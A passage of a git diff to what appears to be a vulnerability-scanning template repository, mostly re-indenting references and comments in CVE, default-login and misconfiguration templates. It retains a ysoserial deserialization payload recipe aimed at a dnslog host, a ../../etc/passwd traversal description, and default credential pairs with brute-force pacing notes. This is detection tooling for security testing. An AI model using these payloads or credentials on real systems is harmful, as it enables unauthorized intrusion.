Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. + Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. + Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce requests: diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 95539c89b6..3044206eb1 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -10,9 +10,9 @@ info: - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - # Note:- This is detection template, To perform deserializes do as below - # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # `cat mad.ot | hex` and replace in along with the url in std-String value +# Note:- This is detection template, To perform deserializes do as below +# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot +# `cat mad.ot | hex` and replace in along with the url in std-String value requests: - raw: diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index ae38d892b3..032841467b 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -7,8 +7,8 @@ info: severity: medium tags: cve,cve2021,moodle,jitsi,xss reference: - - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + - https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 requests: - method: GET diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index a630ca1cab..eeaa087bd7 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -5,13 +5,13 @@ info: author: madrobot severity: critical description: | - Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange,oob reference: - - https://proxylogon.com/#timeline - - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 requests: - raw: diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml index e3038cb194..0b53b90095 100644 --- a/cves/2021/CVE-2021-27651.yaml +++ b/cves/2021/CVE-2021-27651.yaml @@ -5,8 +5,8 @@ info: author: idealphase description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. reference: - - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 + - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 severity: critical tags: cve,cve2021,pega,auth-bypass diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index d1f3b5f64f..09c5027755 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -7,7 +7,7 @@ info: author: pdteam severity: critical reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 tags: cve,cve2021,apache,tapestry requests: diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index cdfbaa9e20..b14c3ad7df 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -7,10 +7,10 @@ info: tags: cve,cve2021,apache,solr,ssrf description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. reference: - - https://www.anquanke.com/post/id/238201 - - https://ubuntu.com/security/CVE-2021-27905 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://www.anquanke.com/post/id/238201 + - https://ubuntu.com/security/CVE-2021-27905 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ requests: - raw: diff --git a/cves/2021/CVE-2021-28073.yaml b/cves/2021/CVE-2021-28073.yaml index aa5d34e1b3..0414c2d4fc 100644 --- a/cves/2021/CVE-2021-28073.yaml +++ b/cves/2021/CVE-2021-28073.yaml @@ -7,8 +7,8 @@ info: description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2 tags: ntopng,cve,cve2021 reference: - - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ - - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md + - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ + - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md requests: - method: GET diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index 53d98b7bfd..cd88038cd7 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: medium description: | - Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. + Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 8f28e7f006..0ad974afd4 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -6,8 +6,8 @@ info: tags: hpe,cve,cve2021,bypass description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager. reference: - - https://www.tenable.com/security/research/tra-2021-15 - - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + - https://www.tenable.com/security/research/tra-2021-15 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 requests: - raw: diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 1284ca92c8..51791de0f0 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -7,8 +7,8 @@ info: severity: medium tags: cve,cve2021,xss,ghost reference: - - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 requests: - method: GET diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 75942eb988..6e406ccb7c 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -6,8 +6,8 @@ info: severity: critical description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. reference: - - https://www.ambionics.io/blog/laravel-debug-rce - - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 + - https://www.ambionics.io/blog/laravel-debug-rce + - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce requests: diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 0d19eb6202..3c91c1e2a2 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -5,8 +5,8 @@ info: author: dhiyaneshDk severity: medium reference: - - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json + - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: cve,cve2021,expressjs,lfi requests: diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index c81ada639b..77ded129f4 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -4,8 +4,8 @@ info: name: Ansi_up XSS description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. reference: - - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf - - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 + - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf + - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik severity: medium diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index b3ef250c02..5a10ae6168 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -7,9 +7,9 @@ info: description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. reference: - - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange requests: diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index 3c5b70ca06..221dabdf34 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -6,8 +6,8 @@ info: severity: critical description: Finding the Tieline Admin Panels with default credentials. reference: - - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 + - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c + - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 tags: cve,cve2021,tieline,default-login # admin:password diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index b8984f1cc8..2a3107ae73 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -7,7 +7,7 @@ info: severity: critical tags: cve,cve2021,openam,rce,java reference: - - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 requests: - method: GET diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml index 3009e5de43..ce8a5524c7 100644 --- a/default-logins/alibaba/alibaba-canal-default-password.yaml +++ b/default-logins/alibaba/alibaba-canal-default-password.yaml @@ -13,7 +13,7 @@ requests: headers: Content-Type: application/json body: | - {"username":"admin","password":"123456"} + {"username":"admin","password":"123456"} matchers-condition: and matchers: diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 49b317b44e..6c73385549 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -18,7 +18,7 @@ requests: gitlab_user: - 1234 - admin - # Enumerate valid user. + # Enumerate valid user. attack: clusterbomb diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index 377385c534..4f7e3f3ba0 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -9,8 +9,8 @@ info: - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://github.com/grafana/grafana/issues/14755 - # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. - # So make sure, not to attempt more than 4 password for same valid user. +# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. +# So make sure, not to attempt more than 4 password for same valid user. requests: @@ -42,7 +42,7 @@ requests: {"user":"admin","password":"§grafana_password§"} - # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin + # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin matchers-condition: and matchers: diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 90151fd83a..9f966d436d 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -8,9 +8,9 @@ info: reference: - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details. - # Update the list with more CNAMEs related to Azure - # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. - # Do not report this without claiming the CNAME. +# Update the list with more CNAMEs related to Azure +# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. +# Do not report this without claiming the CNAME. dns: - name: "{{FQDN}}" diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 2e3f547468..7f0f4ec6ea 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -6,10 +6,10 @@ info: severity: info tags: dns,takeover reference: - - https://securitytrails.com/blog/subdomain-takeover-tips - - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ - - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f - - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + - https://securitytrails.com/blog/subdomain-takeover-tips + - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ + - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f + - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover dns: - name: "{{FQDN}}" diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index 97c367ccdf..443d7a8e30 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -6,8 +6,8 @@ info: severity: info tags: exposure,api reference: - - https://github.com/dwisiswant0/wadl-dumper - - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ + - https://github.com/dwisiswant0/wadl-dumper + - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ requests: - method: GET diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index b1b2a4644a..ae750dfce4 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -6,8 +6,8 @@ info: severity: info tags: config,git,exposure reference: - - https://twitter.com/pratiky9967/status/1230001391701086208 - - https://www.tenable.com/plugins/was/98595 + - https://twitter.com/pratiky9967/status/1230001391701086208 + - https://www.tenable.com/plugins/was/98595 requests: - method: GET diff --git a/exposures/configs/exposed-sharepoint-list.yaml b/exposures/configs/exposed-sharepoint-list.yaml index c1bacf772a..160b2c7e10 100644 --- a/exposures/configs/exposed-sharepoint-list.yaml +++ b/exposures/configs/exposed-sharepoint-list.yaml @@ -5,8 +5,8 @@ info: author: ELSFA7110 severity: low reference: - - https://hackerone.com/reports/761158 - - https://hackerone.com/reports/300539 + - https://hackerone.com/reports/761158 + - https://hackerone.com/reports/300539 tags: config,exposure,sharepoint requests: diff --git a/exposures/configs/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml index 6489c2c300..923f40f980 100644 --- a/exposures/configs/qdpm-info-leak.yaml +++ b/exposures/configs/qdpm-info-leak.yaml @@ -7,7 +7,7 @@ info: severity: high tags: qdpm,exposure reference: - - https://www.exploit-db.com/exploits/50176 + - https://www.exploit-db.com/exploits/50176 requests: - method: GET diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index bfb8e30862..802ed499db 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -7,8 +7,8 @@ info: tags: fuzz reference: - - https://github.com/lijiejie/IIS_shortname_Scanner - - https://www.exploit-db.com/exploits/19525 + - https://github.com/lijiejie/IIS_shortname_Scanner + - https://www.exploit-db.com/exploits/19525 requests: - raw: diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml index e57ca76fa2..a091ac8494 100644 --- a/headless/postmessage-tracker.yaml +++ b/headless/postmessage-tracker.yaml @@ -18,33 +18,33 @@ headless: args: hook: true code: | - (function() {window.alerts = []; + (function() {window.alerts = []; - function logger(found) { - window.alerts.push(found); + function logger(found) { + window.alerts.push(found); + } + + function getStackTrace () { + var stack; + try { + throw new Error(''); } - - function getStackTrace () { - var stack; - try { - throw new Error(''); - } - catch (error) { - stack = error.stack || ''; - } - stack = stack.split('\n').map(function (line) { return line.trim(); }); - return stack.splice(stack[0] == 'Error' ? 2 : 1); + catch (error) { + stack = error.stack || ''; } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); + } - var oldListener = Window.prototype.addEventListener; + var oldListener = Window.prototype.addEventListener; - Window.prototype.addEventListener = function(type, listener, useCapture) { - if(type === 'message') { - logger(getStackTrace()); - } - return oldListener.apply(this, arguments); - }; - })(); + Window.prototype.addEventListener = function(type, listener, useCapture) { + if(type === 'message') { + logger(getStackTrace()); + } + return oldListener.apply(this, arguments); + }; + })(); - args: url: "{{BaseURL}}" action: navigate diff --git a/miscellaneous/tabnabbing-check.yaml b/miscellaneous/tabnabbing-check.yaml index a7085d4359..b92943f34c 100644 --- a/miscellaneous/tabnabbing-check.yaml +++ b/miscellaneous/tabnabbing-check.yaml @@ -6,9 +6,9 @@ info: severity: info tags: misc reference: - - https://owasp.org/www-community/attacks/Reverse_Tabnabbing - - https://www.youtube.com/watch?v=TMKZCHYmtD4 - - https://hackerone.com/reports/211065 + - https://owasp.org/www-community/attacks/Reverse_Tabnabbing + - https://www.youtube.com/watch?v=TMKZCHYmtD4 + - https://hackerone.com/reports/211065 requests: - method: GET diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml index 0e02a7f3ae..6458cde99d 100644 --- a/miscellaneous/unpatched-coldfusion.yaml +++ b/miscellaneous/unpatched-coldfusion.yaml @@ -5,8 +5,8 @@ info: author: Daviey severity: info reference: - - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - - https://twitter.com/Daviey/status/1374070630283415558 + - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html + - https://twitter.com/Daviey/status/1374070630283415558 tags: rce,adobe,misc requests: diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml index 7fb7ddc1a7..9d1034a158 100644 --- a/misconfiguration/akamai-arl-xss.yaml +++ b/misconfiguration/akamai-arl-xss.yaml @@ -6,11 +6,11 @@ info: severity: medium tags: akamai,xss reference: - - https://github.com/war-and-code/akamai-arl-hack - - https://twitter.com/SpiderSec/status/1421176297548435459 - - https://warandcode.com/post/akamai-arl-hack/ - - https://github.com/cybercdh/goarl - - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US + - https://github.com/war-and-code/akamai-arl-hack + - https://twitter.com/SpiderSec/status/1421176297548435459 + - https://warandcode.com/post/akamai-arl-hack/ + - https://github.com/cybercdh/goarl + - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US requests: - method: GET diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml index 83fbedf084..c169a53e49 100644 --- a/misconfiguration/exposed-service-now.yaml +++ b/misconfiguration/exposed-service-now.yaml @@ -6,8 +6,8 @@ info: severity: info description: detectes misconfigured Service-now ITSM instances reference: - - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - - https://github.com/leo-hildegarde/SnowDownKB/ + - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 + - https://github.com/leo-hildegarde/SnowDownKB/ tags: servicenow requests: diff --git a/misconfiguration/gitlab/gitlab-public-repos.yaml b/misconfiguration/gitlab/gitlab-public-repos.yaml index 7f0ed11c0f..0a2869055e 100644 --- a/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -6,8 +6,8 @@ info: severity: info tags: gitlab reference: - - https://twitter.com/ldionmarcil/status/1370052344562470922 - - https://github.com/ldionmarcil/gitlab-unauth-parser + - https://twitter.com/ldionmarcil/status/1370052344562470922 + - https://github.com/ldionmarcil/gitlab-unauth-parser requests: - method: GET diff --git a/misconfiguration/gitlab/gitlab-public-snippets.yaml b/misconfiguration/gitlab/gitlab-public-snippets.yaml index 61a24b4fd3..aff6a9ff43 100644 --- a/misconfiguration/gitlab/gitlab-public-snippets.yaml +++ b/misconfiguration/gitlab/gitlab-public-snippets.yaml @@ -5,8 +5,8 @@ info: severity: info tags: gitlab reference: - - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 - - https://twitter.com/intigriti/status/1375078783338876929 + - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 + - https://twitter.com/intigriti/status/1375078783338876929 requests: - method: GET diff --git a/misconfiguration/gitlab/gitlab-user-enumeration.yaml b/misconfiguration/gitlab/gitlab-user-enumeration.yaml index 50a937dc36..9a7fb41992 100644 --- a/misconfiguration/gitlab/gitlab-user-enumeration.yaml +++ b/misconfiguration/gitlab/gitlab-user-enumeration.yaml @@ -14,9 +14,9 @@ requests: headers: Content-Type: application/json body: | - { - "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }" - } + { + "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }" + } matchers-condition: and diff --git a/misconfiguration/sap/sap-netweaver-info-leak.yaml b/misconfiguration/sap/sap-netweaver-info-leak.yaml index 22bec165a9..f39c4f1d79 100644 --- a/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -7,8 +7,8 @@ info: severity: medium tags: sap reference: - - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/ - - https://github.com/Jean-Francois-C/SAP-Security-Audit + - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/ + - https://github.com/Jean-Francois-C/SAP-Security-Audit requests: - method: GET diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml index b1e5ae80f7..116f3cd89b 100644 --- a/misconfiguration/zabbix-dashboards-access.yaml +++ b/misconfiguration/zabbix-dashboards-access.yaml @@ -6,8 +6,8 @@ info: severity: medium description: View dashboard with guest login. reference: - - https://www.exploit-db.com/ghdb/5595 - - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt + - https://www.exploit-db.com/ghdb/5595 + - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt tags: zabbix,unauth requests: diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml index 2b4744a079..0897da8dc9 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/network/deprecated-sshv1-detection.yaml @@ -7,8 +7,8 @@ info: tags: network,ssh,openssh description: SSHv1 is a deprecated and have known cryptographic issues. reference: - - https://www.kb.cert.org/vuls/id/684820 - - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 + - https://www.kb.cert.org/vuls/id/684820 + - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 network: - host: diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index ece21f2b90..bd7a7338cc 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -7,9 +7,9 @@ info: tags: network,openssh description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. reference: - - http://seclists.org/fulldisclosure/2016/Jul/51 - - https://security-tracker.debian.org/tracker/CVE-2016-6210 - - http://openwall.com/lists/oss-security/2016/08/01/2 + - http://seclists.org/fulldisclosure/2016/Jul/51 + - https://security-tracker.debian.org/tracker/CVE-2016-6210 + - http://openwall.com/lists/oss-security/2016/08/01/2 network: - host: diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml index a3eea7ead5..f39d129637 100644 --- a/takeovers/ceros-takeover.yaml +++ b/takeovers/ceros-takeover.yaml @@ -6,8 +6,8 @@ info: severity: info tags: takeover reference: - - https://twitter.com/abison_binoy/status/1412606224030339072 - - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ + - https://twitter.com/abison_binoy/status/1412606224030339072 + - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ requests: - method: GET diff --git a/technologies/detect-sentry.yaml b/technologies/detect-sentry.yaml index 8a63c406fe..c89bc2ccda 100644 --- a/technologies/detect-sentry.yaml +++ b/technologies/detect-sentry.yaml @@ -6,8 +6,8 @@ info: severity: info tags: ssrf,sentry,tech reference: - - https://hackerone.com/reports/374737 - - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en + - https://hackerone.com/reports/374737 + - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en requests: - method: GET diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft-exchange-server-detect.yaml index b89745b772..d400fe85de 100644 --- a/technologies/microsoft-exchange-server-detect.yaml +++ b/technologies/microsoft-exchange-server-detect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse description: | - Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. requests: - method: GET diff --git a/technologies/waf-detect.yaml b/technologies/waf-detect.yaml index a106e71a07..5eba810d3c 100644 --- a/technologies/waf-detect.yaml +++ b/technologies/waf-detect.yaml @@ -10,11 +10,11 @@ info: 